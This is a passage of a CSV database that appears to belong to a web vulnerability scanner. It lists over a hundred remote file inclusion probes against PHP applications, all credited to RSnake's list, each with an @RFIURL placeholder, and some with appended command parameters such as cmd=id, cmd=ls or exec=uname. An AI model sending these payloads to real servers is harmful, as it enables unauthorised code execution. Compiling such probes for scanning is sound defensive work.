(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004308\",\"5292\",\"c\",\"/biblioteca/luo_save.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004309\",\"5292\",\"c\",\"/biblioteca/sog_form.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004310\",\"5292\",\"c\",\"/biblioteca/sog_save.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004311\",\"5292\",\"c\",\"/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004312\",\"5292\",\"c\",\"/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004313\",\"5292\",\"c\",\"/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004314\",\"5292\",\"c\",\"/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004315\",\"5292\",\"c\",\"/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004316\",\"5292\",\"c\",\"/bild.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004317\",\"5292\",\"c\",\"/bin/qte_init.php?qte_root=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004318\",\"5292\",\"c\",\"/bingoserver.php3?response_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004319\",\"5292\",\"c\",\"/block.php?Include=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004320\",\"5292\",\"c\",\"/blocks/birthday.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004321\",\"5292\",\"c\",\"/blocks/events.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004322\",\"5292\",\"c\",\"/blocks/help.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004323\",\"5292\",\"c\",\"/blogcms/admin/media.php?DIR_LIBS=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004324\",\"5292\",\"c\",\"/blogcms/admin/xmlrpc/server.php?DIR_LIBS=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004325\",\"5292\",\"c\",\"/blogcms/index.php?DIR_PLUGINS=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004326\",\"5292\",\"c\",\"/board/post.php?qb_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004327\",\"5292\",\"c\",\"/boitenews4/index.php?url_index=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004328\",\"5292\",\"c\",\"/books/allbooks.php?home=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004329\",\"5292\",\"c\",\"/books/home.php?home=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004330\",\"5292\",\"c\",\"/books/mybooks.php?home=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004331\",\"5292\",\"c\",\"/bp_ncom.php?bnrep=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004332\",\"5292\",\"c\",\"/bp_ncom.php?bnrep=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004333\",\"5292\",\"c\",\"/bp_news.php?bnrep=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004334\",\"5292\",\"c\",\"/bridge/enigma/E2_header.inc.php?boarddir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004335\",\"5292\",\"c\",\"/bridge/yabbse.inc.php?sourcedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004336\",\"5292\",\"c\",\"/bridges/SMF/logout.php?path_to_smf=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004337\",\"5292\",\"c\",\"/bu/bu_cache.php?bu_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004338\",\"5292\",\"c\",\"/bu/bu_claro.php?bu_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004339\",\"5292\",\"c\",\"/bu/bu_parse.php?bu_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004340\",\"5292\",\"c\",\"/bu/process.php?bu_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004341\",\"5292\",\"c\",\"/buddy.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004342\",\"5292\",\"c\",\"/builddb.php?env_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004343\",\"5292\",\"c\",\"/button/settings_sql.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004344\",\"5292\",\"c\",\"/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004345\",\"5292\",\"c\",\"/cal.func.php?dir_edge_lang=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004346\",\"5292\",\"c\",\"/calcul-page.php?home=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004347\",\"5292\",\"c\",\"/calendar.php?cfg_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004348\",\"5292\",\"c\",\"/calendar.php?lang=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004349\",\"5292\",\"c\",\"/calendar.php?path_to_calendar=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004350\",\"5292\",\"c\",\"/calendar.php?vwar_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004351\",\"5292\",\"c\",\"/calendar.php?vwar_root=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004352\",\"5292\",\"c\",\"/calendar/demo/index.php?date=&v=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004353\",\"5292\",\"c\",\"/calendar/payment.php?insPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004354\",\"5292\",\"c\",\"/calendario/cal_insert.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004355\",\"5292\",\"c\",\"/calendario/cal_save.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004356\",\"5292\",\"c\",\"/calendario/cal_saveactivity.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004357\",\"5292\",\"c\",\"/cart.php?lang_list=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004358\",\"5292\",\"c\",\"/cart_content.php?cart_isp_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004359\",\"5292\",\"c\",\"/catalogg/inludes/include_once.php?include_file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004360\",\"5292\",\"c\",\"/catalogshop.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004361\",\"5292\",\"c\",\"/cdsagenda/modification/SendAlertEmail.php?AGE=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004362\",\"5292\",\"c\",\"/cfagcms/themes/default/index.php?main=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004363\",\"5292\",\"c\",\"/ch_readalso.php?read_xml_include=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004364\",\"5292\",\"c\",\"/challenge.php?vwar_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004365\",\"5292\",\"c\",\"/challenge.php?vwar_root=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004366\",\"5292\",\"c\",\"/change_preferences2.php?target=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004367\",\"5292\",\"c\",\"/chat.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004368\",\"5292\",\"c\",\"/chat.php?my[root]=@RFIURL?cm=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004369\",\"5292\",\"c\",\"/chat/adminips.php?banned_file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004370\",\"5292\",\"c\",\"/chat/users_popupL.php3?From=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004371\",\"5292\",\"c\",\"/checkout.php?abs_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004372\",\"5292\",\"c\",\"/checkout.php?abs_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004373\",\"5292\",\"c\",\"/ciamos_path/modules/forum/include/config.php?module_cache_path='@RFIURL'\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004374\",\"5292\",\"c\",\"/circ.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004375\",\"5292\",\"c\",\"/circolari/cir_save.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004376\",\"5292\",\"c\",\"/citywriter/head.php?path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004377\",\"5292\",\"c\",\"/cl_files/index.php?path_to_calendar=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004378\",\"5292\",\"c\",\"/claroline/auth/ldap/authldap.php?includePath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004379\",\"5292\",\"c\",\"/claroline/phpbb/page_tail.php?includePath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004380\",\"5292\",\"c\",\"/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004381\",\"5292\",\"c\",\"/class.mysql.php?path_to_bt_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004382\",\"5292\",\"c\",\"/class/Wiki/Wiki.php?c_node[class_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004383\",\"5292\",\"c\",\"/class/jpcache/jpcache.php?_PSL[classdir]=@RFIURL?exec=uname\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004384\",\"5292\",\"c\",\"/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004385\",\"5292\",\"c\",\"/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004386\",\"5292\",\"c\",\"/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004387\",\"5292\",\"c\",\"/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004388\",\"5292\",\"c\",\"/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004389\",\"5292\",\"c\",\"/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004390\",\"5292\",\"c\",\"/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004391\",\"5292\",\"c\",\"/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004392\",\"5292\",\"c\",\"/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004393\",\"5292\",\"c\",\"/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004394\",\"5292\",\"c\",\"/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004395\",\"5292\",\"c\",\"/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004396\",\"5292\",\"c\",\"/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004397\",\"5292\",\"c\",\"/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004398\",\"5292\",\"c\",\"/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004399\",\"5292\",\"c\",\"/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004400\",\"5292\",\"c\",\"/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004401\",\"5292\",\"c\",\"/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004402\",\"5292\",\"c\",\"/classes/Cache.class.php?rootdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004403\",\"5292\",\"c\",\"/classes/Customer.class.php?rootdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004404\",\"5292\",\"c\",\"/classes/Performance.class.php?rootdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004405\",\"5292\",\"c\",\"/classes/Project.class.php?rootdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004406\",\"5292\",\"c\",\"/classes/Representative.class.php?rootdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004407\",\"5292\",\"c\",\"/classes/User.class.php?rootdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004408\",\"5292\",\"c\",\"/classes/admin_o.php?absolutepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004409\",\"5292\",\"c\",\"/classes/adodbt/sql.php?classes_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004410\",\"5292\",\"c\",\"/classes/adodbt/sql.php?classes_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004411\",\"5292\",\"c\",\"/classes/board_o.php?absolutepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004412\",\"5292\",\"c\",\"/classes/class_admin.php?PathToComment=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004413\",\"5292\",\"c\",\"/classes/class_comments.php?PathToComment=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004414\",\"5292\",\"c\",\"/classes/class_mail.inc.php?path_to_folder=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004415\",\"5292\",\"c\",\"/classes/common.php?rootdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004416\",\"5292\",\"c\",\"/classes/core/language.php?rootdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004417\",\"5292\",\"c\",\"/classes/dev_o.php?absolutepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004418\",\"5292\",\"c\",\"/classes/file_o.php?absolutepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004419\",\"5292\",\"c\",\"/classes/html/com_articles.php?absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004420\",\"5292\",\"c\",\"/classes/phpmailer/class.cs_phpmailer.php?classes_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004421\",\"5292\",\"c\",\"/classes/query.class.php?baseDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004422\",\"5292\",\"c\",\"/classes/tech_o.php?absolutepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004423\",\"5292\",\"c\",\"/classified.php?insPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004424\",\"5292\",\"c\",\"/classified_right.php?language_dir=@RFIURL\",\"GET\",\"PHP 